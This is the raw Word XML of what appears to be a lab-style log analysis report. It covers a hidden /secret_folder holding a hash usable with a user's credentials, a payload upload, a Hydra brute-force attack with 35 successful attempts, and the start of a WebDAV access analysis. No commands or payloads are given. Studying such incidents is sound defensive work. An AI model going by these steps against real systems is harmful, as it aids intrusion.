                <v:shape id="Picture 87" o:spid="_x0000_s1064" type="#_x0000_t75" style="position:absolute;left:578;top:250;width:13267;height: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">
                  <v:imagedata r:id="rId25" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 86" o:spid="_x0000_s1065" type="#_x0000_t202" style="position:absolute;left:578;top:250;width:13267;height:3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525215FD" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:rPr>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="32226B6B" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:rPr>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="6D7FBFE9" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:rPr>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="58F237E4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:spacing w:before="7"/>
                          <w:rPr>
                            <w:sz w:val="32"/>
                          </w:rPr>
                        </w:pPr>
                      </w:p>
                      <w:p w14:paraId="2AE26F08" w14:textId="5751E830" w:rsidR="00377979" w:rsidRDefault="00377979">
                        <w:pPr>
                          <w:ind w:left="2877" w:right="2917"/>
                          <w:jc w:val="center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46F19EE" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15429A6D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="372B0EB5" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DFF7B2" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="702E1525" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32EE1019" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71EC5909" w14:textId="59CB2DC3" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyTex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757B00BD" wp14:editId="0D0A28C8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>121285</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8595360" cy="10795"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="94" name="Lin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201BEF" id="Line 84" o:spid="_x0000_s1026" style="position:absolute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9.55pt" to="698.4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" strokecolor="#a8b6bf">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="132092D4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="12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63AD7980" w14:textId="5F4F96CD" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:spacing w:before="23"/>
        <w:ind w:left="1233"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz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09856" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AD84C59" wp14:editId="3A7616A5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93" name="Lin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9B47DB" id="Line 83" o:spid="_x0000_s1026" style="position:absolute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" strokecolor="#595959">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>Analysis: Finding the Request for the Hidden Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111AFCF8" w14:textId="672C5958" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1213"/>
        </w:tabs>
        <w:spacing w:before="140"/>
        <w:ind w:hanging="290"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>On the 11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:r w:rsidR="000A2543">
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Nov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21 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">40238 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>requests were made to access the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>secret_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="536764EC" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1213"/>
        </w:tabs>
        <w:spacing w:before="8"/>
        <w:ind w:hanging="290"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>secret_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">contained a hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">that’s </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">usable for system access using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Ryan’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40979FBB" w14:textId="2AF4FC19" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1213"/>
        </w:tabs>
        <w:spacing w:before="9"/>
        <w:ind w:hanging="29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1680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26F5A536" wp14:editId="3F90A41E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>170180</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>290830</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8656955" cy="2252345"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="9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56955" cy="2252345"/>
                          <a:chOff x="268" y="458"/>
                          <a:chExt cx="13633" cy="3547"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="9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" y="457"/>
                            <a:ext cx="8382" cy="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3" y="1295"/>
                            <a:ext cx="8968" cy="2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06671" id="Group 80" o:spid="_x0000_s1026" style="position:absolute;margin-left:13.4pt;margin-top:22.9pt;width:681.65pt;height:177.35pt;z-index:15751680;mso-position-horizontal-relative:page" coordorigin="268,458" coordsize="13633,35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sooorQz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W+I7ALa+7n&#10;H5V1Jz2rP1/Q4tbtRFNJtZTlW9KAPP8AjPSjHtXQj4e3ecf2gn/AkNL/AMK9u/8AoJR/9+zV3RHK&#10;znT0prfSujPw9usf8hKP/v2aSTwBcoMtqUeACeIz6U+ZcyFKL5SP4Zf8ipbf8D/9CNFL8Nk8vwxD&#10;HnO1pBn/AIEaKqXxMS2Lfw7/AOPrWf8AsKN/6CK6iuX+HX/H1rH/AGFG/wDQRXUVnU+Jjp/CFFFF&#10;S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HXqKKKAE2jvRsX0paKAGsq7elQ&#10;3QAVsD+E/wAqnf7tQ3f3W/3T/Kj7SJl8Jyvw7/5F2Pj/AJay/wDobUUfDz/kXY/+usv/AKG1FbS+&#10;Iks/Dr/j61j/ALCjf+giuorl/h3/AMfWs/8AYUb/ANBFdRWdT4mFP4QoooqTQKKKKACigkAZJoDA&#10;9DQAUUhZQcE0uQe9ABRQWA6mgEHkUAFFGcdaM9qACijNIHU9DQAtFBIHWgEHoaACijPaigAopNw9&#10;aWgAoopCwHU0ALRSbl9aW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j/dqG7+63+6f5VM&#10;/wB2obv7rf7p/lR9pEy+E5X4ef8AIux/9dZf/Q2oo+Hf/Iux/wDXWX/0NqK2l8RJZ+Hf/H1rP/YU&#10;b/0EV1Fcv8Ov+PrWP+wo3/oIrqKzqfEwp/CFFFFS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">
                <v:shape id="Picture 82" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:268;top:457;width:8382;height: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">
                  <v:imagedata r:id="rId28" o:title=""/>
                </v:shape>
                <v:shape id="Picture 81" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:4933;top:1295;width:8968;height:2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">
                  <v:imagedata r:id="rId29" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>secret_folder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>allowed me to upload a payload, further exposing the</w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D7954A" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5086EEE1" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63871403" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5017B4F8" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38866DEE" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18340327" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E69B1C8" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57D60B7D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49839F57" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598499C8" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F0C6AF1" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6F7EDC" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12629990" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA9E268" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5F995A" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="418B0F5A" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED8BAB4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7F380D" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A960817" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C12B20" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25A0637C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15156570" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70E147E9" w14:textId="4899BB53" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6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38CFC8E8" wp14:editId="65AA12A2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>247650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8595360" cy="10160"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="89" name="Lin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DE1C45" id="Line 79" o:spid="_x0000_s1026" style="position:absolute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19.5pt" to="698.4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" strokecolor="#a8b6bf">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90A7C4" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28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0180AFE5" w14:textId="238442CA" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:right="26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11392" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="165B4047" wp14:editId="1D6AC13F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88" name="Lin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FB29D5" id="Line 78" o:spid="_x0000_s1026" style="position:absolute;z-index:-1570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" strokecolor="#595959">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:t>Analysis: Uncovering the Brute Force Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E8A5AE" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="746"/>
          <w:tab w:val="left" w:pos="5416"/>
        </w:tabs>
        <w:spacing w:before="65" w:line="317" w:lineRule="exact"/>
        <w:ind w:hanging="290"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">143332 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hits were made</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17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rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:position w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3828D49C" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="746"/>
        </w:tabs>
        <w:spacing w:line="285" w:lineRule="exact"/>
        <w:ind w:hanging="290"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">35 attacks </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">were successful that returned </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">301 HTTP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11714628" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:spacing w:before="0" w:line="286" w:lineRule="exact"/>
        <w:ind w:left="745"/>
      </w:pPr>
      <w:r>
        <w:t>“Moved Permanently”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419D2C12" w14:textId="68B5F82F" w:rsidR="00377979" w:rsidRDefault="000A2543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45BDAF05" wp14:editId="58023B9E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>368935</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>248285</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8543925" cy="2912110"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="8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43925" cy="2912110"/>
                          <a:chOff x="581" y="391"/>
                          <a:chExt cx="13455" cy="4586"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="86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" y="390"/>
                            <a:ext cx="6279" cy="4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9" y="590"/>
                            <a:ext cx="7177" cy="3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DF4A7" id="Group 75" o:spid="_x0000_s1026" style="position:absolute;margin-left:29.05pt;margin-top:19.55pt;width:672.75pt;height:229.3pt;z-index:-15704576;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordorigin="581,391" coordsize="13455,45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V7/&#10;AMezfSpaivf+PZvpQB80/th/8jnpf/YOP/oVFJ+2IwHjPS+f+Yb/AOzUUAfQXhzwJofhi+utT06J&#10;mub2Tdc3VxM80zrvkdY98jMwjRpZCkYIRPMbaq5NbXOaKKBRioqyIbq0FyysSPl6ZX/P/wCrNQya&#10;WJeHdfXG3j/PJ/OrlFAyo+lrI253U9vu9h0/XNINKClispG73P8Aj/n8sXKKd3axPLG97FEaSVG3&#10;zQR/D8oGOMUf2QT1m9yNvXkc/Xj8KvUUXlawcsew2NSiBSc4706iik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">
                <v:shape id="Picture 77" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:580;top:390;width:6279;height:4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">
                  <v:imagedata r:id="rId32" o:title=""/>
                </v:shape>
                <v:shape id="Picture 76" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:6859;top:590;width:7177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">
                  <v:imagedata r:id="rId33" o:title=""/>
                </v:shape>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B08994" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="209AC0D8" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE4DC48" w14:textId="1F257705" w:rsidR="00377979" w:rsidRDefault="000A2543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18F03ABF" wp14:editId="6C4E9E8D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>274320</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>144780</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8595360" cy="10160"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="84" name="Lin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B41946" id="Line 74" o:spid="_x0000_s1026" style="position:absolute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11.4pt" to="698.4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" strokecolor="#a8b6bf">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E3B0BD" w14:textId="77777777" w:rsidR="00377979" w:rsidRDefault="00377979">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15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4B0022CB" w14:textId="21BF3AA5" w:rsidR="00377979" w:rsidRDefault="000A2543">
      <w:pPr>
        <w:spacing w:before="23"/>
        <w:ind w:left="457" w:right="270"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz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12928" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="530A6264" wp14:editId="7B20508D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83" name="Lin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E309E1" id="Line 73" o:spid="_x0000_s1026" style="position:absolute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" strokecolor="#595959">
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="006B15D1">
        <w:rPr>
          <w:rFonts w:ascii="Roboto"/>
          <w:b/>
          <w:sz w:val="48"/>
        </w:rPr>
        <w:t>Analysis: Finding the WebDAV Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F43A14F" w14:textId="3243943A" w:rsidR="00377979" w:rsidRDefault="006B15D1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1262"/>
        </w:tabs>
        <w:spacing w:before="117" w:line="302" w:lineRule="exact"/>
        <w:ind w:hanging="290"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">124 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">attempts were made to access </w:t>
      </w:r>
      <w:r w:rsidR="000A2543">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the.</w:t>
      </w:r>
      <w:r w:rsidR="000A2543">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>webdav</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
